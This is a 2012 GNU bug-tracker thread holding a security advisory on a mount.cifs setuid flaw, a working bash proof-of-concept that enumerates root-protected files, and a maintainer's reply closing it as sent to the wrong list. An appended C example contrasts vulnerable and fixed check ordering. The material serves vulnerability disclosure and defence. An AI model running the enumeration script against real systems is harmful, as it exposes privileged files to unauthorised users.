bug#10965: mount.cifs vulnerability
Status (debbugs control): retitled "mount.cifs vulnerability"; reassigned to coreutils; submitter Jesus Olmos; severity normal; tagged notabug.
From: Jesus Olmos (Blueliv) <jesus.olmos@blueliv.com>
To: bug-coreutils@gnu.org
Date: Wed, 07 Mar 2012 19:33:49 +0100
Message-ID: <4F57AA0D.7030009@blueliv.com>
Subject: mount.cifs vulnerability

Hello, here is a bug report for mount.cifs. It is a little security breach on Linux permissions by controlling a privileged chdir().

Regards.
########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################

1. VULNERABILITY
-------------------------
Linux arbitrary privileged chdir(); this leads to arbitrary file identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of the Linux base system, and is setuid on most distributions. This software mounts CIFS partitions onto directories authorized by fstab.

3. DESCRIPTION
-------------------------
Although there are no authorized CIFS mounts, it is possible, via the second parameter, to control a privileged chdir() syscall and infer its return value through the responses. This implies a little security breach on Linux permissions. A non-root user can enumerate files and directories as root.

This can help to exploit other vulnerabilities, enumerate /root/ contents, descriptors used by any process, user homes, etc. One of the attack vectors is a /root/ directory scan:

[sha0@spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

It also lets you enumerate sub-sub-directories in order to dump readable files.

4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos@blueliv.com
# discover root protected files & directories, user homes, process descriptors, ...

[ $# -eq 2 ] || { echo "usage: $0 wordlist path" >&2; exit 1; }

wordlist="$1"
path="$2"

# One privileged chdir() per candidate name: the share //127.0.0.1/a never
# needs to exist, because mount.cifs fails on the mountpoint before it
# contacts the server.  stdout and stderr both go to the log so each
# "name:" prefix is followed by the error text for that name.
while read -r i; do
    echo -n "$i:"
    /sbin/mount.cifs "//127.0.0.1/a" "$path/$i"
done < "$wordlist" 2>"log.$$" 1>&2

# chdir() succeeded, then the fstab check refused the mount: a directory
echo "--- directories ---"
grep 'denied' "log.$$" | cut -d ':' -f 1

# chdir() failed with ENOTDIR: a regular file
echo "--- files ---"
grep -i 'not a directory' "log.$$" | cut -d ':' -f 1

rm -f "log.$$"

5. BUSINESS IMPACT
-------------------------
Confidentiality can be breached. This method of transferring files is highly dangerous and can lead to remote control of the server.

6. SYSTEMS AFFECTED
-------------------------
All versions are affected.

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org

9. CREDITS
-------------------------
Jesus Olmos Gonzalez
jolmos(at)blueliv(dot)com
BLUELIV

10. DISCLOSURE TIMELINE
-------------------------
February 20, 2012: Vulnerability discovered
March 07, 2012: Reported to the vendor

11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

--
Jesus Olmos
jesus.olmos@blueliv.com
Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900


From: Eric Blake (Red Hat) <eblake@redhat.com>
To: Jesus Olmos
Cc: 10965-done@debbugs.gnu.org
Date: Wed, 07 Mar 2012 11:45:54 -0700
Message-ID: <4F57ACE2.4070703@redhat.com>
In-Reply-To: <4F57AA0D.7030009@blueliv.com>
Subject: Re: bug#10965: mount.cifs vulnerability
tag 10965 notabug
thanks

On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs,
> is a little security breach on linux permissions by controlling a
> privileged chdir()

Thanks for the report, but you have sent it to the wrong list. GNU coreutils does not maintain mount.cifs, so there is nothing this list can do about fixing anything. I'm closing the coreutils bug aspect, although I encourage you to continue pursuing a correct fix with the correct folks in charge of mount.cifs.

--
Eric Blake   eblake@redhat.com    +1-919-301-3266
Libvirt virtualization library http://libvirt.org


Debbugs internal control message, Thu, 05 Apr 2012 11:24:03 +0000: bug archived.
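The ordering bug the advisory above describes, and the reordering it proposes as the fix, as an added C example. This is not code from the advisory, from mount.cifs/cifs-utils, or from coreutils. Assumptions: a hypothetical allow-list ALLOWED_MOUNTPOINTS stands in for the fstab check, the scratch directory under /tmp with one sub-directory and one file is constructed here, and the probes run unprivileged, so the oracle is only shown on paths the caller can already reach. In the real setuid case chdir() ran as root, which is what let root_eye.sh classify entries of /root/ that the caller could not otherwise see.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Hypothetical allow-list standing in for mount.cifs's fstab check. */
static const char *const ALLOWED_MOUNTPOINTS[] = { "/mnt/share", NULL };

enum probe_result { PR_OK, PR_DENIED, PR_NOT_DIR, PR_NOT_FOUND, PR_OTHER };

static int is_allowed(const char *mountpoint) {
    for (const char *const *p = ALLOWED_MOUNTPOINTS; *p; p++)
        if (strcmp(*p, mountpoint) == 0)
            return 1;
    return 0;
}

static enum probe_result errno_to_result(int err) {
    switch (err) {
    case ENOTDIR: return PR_NOT_DIR;    /* "Not a directory": a file is there   */
    case ENOENT:  return PR_NOT_FOUND;  /* "No such file or directory"           */
    default:      return PR_OTHER;      /* EACCES etc.; never EACCES when root   */
    }
}

/* Vulnerable ordering (what the advisory describes): the still-privileged
 * process chdir()s into the caller-chosen path first and only then consults
 * the allow-list, so the distinct failure modes of chdir() become an oracle. */
enum probe_result vulnerable_mount(const char *mountpoint) {
    if (chdir(mountpoint) != 0)
        return errno_to_result(errno);
    if (!is_allowed(mountpoint))
        return PR_DENIED;
    return PR_OK;
}

/* Fixed ordering (the advisory's proposed solution): authorize the mountpoint
 * string before touching the filesystem with elevated privileges.  Every
 * unauthorized path, whatever is or is not there, yields the same PR_DENIED. */
enum probe_result fixed_mount(const char *mountpoint) {
    if (!is_allowed(mountpoint))
        return PR_DENIED;
    if (chdir(mountpoint) != 0)
        return errno_to_result(errno);
    return PR_OK;
}

/* What root_eye.sh infers from the vulnerable program's error text. */
const char *attacker_inference(enum probe_result r) {
    switch (r) {
    case PR_OK:        return "mounted";
    case PR_DENIED:    return "directory";  /* chdir() succeeded, so it exists and is a dir */
    case PR_NOT_DIR:   return "file";
    case PR_NOT_FOUND: return "absent";
    default:           return "unknown";
    }
}

static int join_path(char *dst, size_t n, const char *dir, const char *name) {
    int r = snprintf(dst, n, "%s/%s", dir, name);
    return (r < 0 || (size_t)r >= n) ? -1 : 0;
}

/* Constructed fixture (not from the advisory): a per-process scratch directory
 * holding one sub-directory and one regular file, so probes run unprivileged. */
static int setup_fixture(char *base, size_t n) {
    char p[4096];
    int r = snprintf(base, n, "/tmp/chdir_oracle_%ld", (long)getpid());
    if (r < 0 || (size_t)r >= n)
        return -1;
    if (mkdir(base, 0700) != 0 && errno != EEXIST)
        return -1;
    if (join_path(p, sizeof p, base, "secret_dir") != 0 ||
        (mkdir(p, 0700) != 0 && errno != EEXIST))
        return -1;
    if (join_path(p, sizeof p, base, "secret_file") != 0)
        return -1;
    FILE *f = fopen(p, "w");
    if (f == NULL)
        return -1;
    fclose(f);
    return 0;
}

/* Probe NAME inside the (lazily created) fixture with either ordering. */
enum probe_result probe_fixture(const char *name, int use_fixed_ordering) {
    static char base[64];
    char p[4096];
    if (base[0] == '\0' && setup_fixture(base, sizeof base) != 0)
        return PR_OTHER;
    if (join_path(p, sizeof p, base, name) != 0)
        return PR_OTHER;
    return use_fixed_ordering ? fixed_mount(p) : vulnerable_mount(p);
}

int main(void) {
    const char *names[] = { "secret_dir", "secret_file", "missing" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-12s vulnerable -> %-10s fixed -> %s\n", names[i],
               attacker_inference(probe_fixture(names[i], 0)),
               attacker_inference(probe_fixture(names[i], 1)));
    return 0;
}
```

Running it prints one line per probed name: the vulnerable column tells the directory, the file and the absent name apart, exactly the three buckets root_eye.sh greps for, while the fixed column reports the same denial for all three. Reordering is the minimal fix the advisory asks for; a stricter helper would also drop to the caller's real uid before any filesystem access on a caller-supplied path, so that even a path that passes the allow-list cannot be used as a root-level probe.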